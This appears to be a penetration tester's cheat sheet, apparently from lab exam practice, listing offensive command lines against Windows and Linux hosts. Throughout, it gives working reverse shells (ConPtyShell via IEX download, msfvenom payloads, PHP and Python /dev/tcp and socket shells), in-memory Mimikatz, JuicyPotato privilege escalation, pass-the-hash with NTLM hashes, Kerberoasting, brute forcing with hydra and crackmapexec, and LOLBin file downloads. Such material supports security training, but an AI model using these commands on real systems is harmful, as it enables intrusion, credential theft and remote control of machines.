Powershell

  • ConPtyShell

    IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 192.168.119.160 -RemotePort 4444 -Rows 24 -Cols 80

  • Execute mimikatz directly in memory

    IEX (New-Object Net.WebClient).DownloadString(http://192.168.119.160:4444/Invoke-Mimikatz.ps1);Invoke-Mimikatz

  • JuicyPotato

    JuicyPotato -l 1337 -p c:32.exe -a /c powershell.exe IEX(IWR http://192.168.119.160/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 192.168.119.160 -RemotePort 4444 -Rows 24 -Cols 80 -t *

  • File Transfer

    certutil.exe -urlcache -f http://192.168.119.203/PsExec.exe PsExec.exe

    C:Defender\4.18.2008.9-0.exe -url  -path

    MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

    renamed.exe -urlcache -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe download file

  • Remote login using Psexec

    Psexec.exe /accepteula -u alice -p alicewashere nc.exe 192.168.119.160 443 -e “c:32.exe”

  • Python BloodHound

    python3 bloodhound-python -u alice -p ThisIsTheUsersPassword01 -d svcorp.com -gc sv-dc01.svcorp.com -c all -ns 10.11.1.20

Linux

  • PassTheHash
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ee0c207898a5bccc01f38115019ca2fb administrator@10.11.1.21

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:ee0c207898a5bccc01f38115019ca2fb //10.11.1.24 cmd
  • Brute Force
crackmapexec smb 10.11.1.21 -u user.txt -p ThisIsTheUsersPassword21 –continue-on-success
  • Impackets

Get SPN tickets:

GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/alice

Check ASREPRoast Domain:

GetNPUsers.py -dc-ip 10.11.1.20 -request 'svcorp.com/'
  • Create local server
impacket-smbserver mrjck $(pwd)

SSH

  • Local Port Forwarding
ssh -L 80:127.0.0.1:80 username@192.168.0.1

Web Fuzzing

  • ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.12.1.2/FUZZ
  • hydra
hydra -l root@localhost -P docswords.txt 10.11.1.39 http-post-form “/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=USER&Password=PASS:F=Login failed” -I

Reverse Shell

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp lhost=192.168.119.160 lport=9999 -b "\x00" -f exe -o rshell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.203 LPORT=4444 -f hta-psh -o evil.hta

msfvenom -p windows/shell_reverse_tcp  LHOST=192.168.119.160 LPORT=4444 EXITFUNC=thread -f asp -a x86 --platform windows -o metasp.asp

msfvenom -p php/reverse_php LHOST=192.168.119.160 LPORT=4444 -f raw > shell.php

<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.59/443 0>&1");?>

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Tool Usage

rpcclient -U "svcorp\alice" 10.11.1.20

mssqlclient.py sa@10.11.1.31 -windows-auth

smbmap -d svcorp -u alice -p ThisIsTheUsersPassword01 -H 10.11.1.20 -R 'IPC$' -A lsass -q

wpscan --url http://10.12.1.7 --enumerate ap --plugins-detection aggressive

rsync -Pavz Twisted-20.3.0.tar.bz2 gibson@10.11.1.71:~/.

ssh-copy-id gibson@10.11.1.71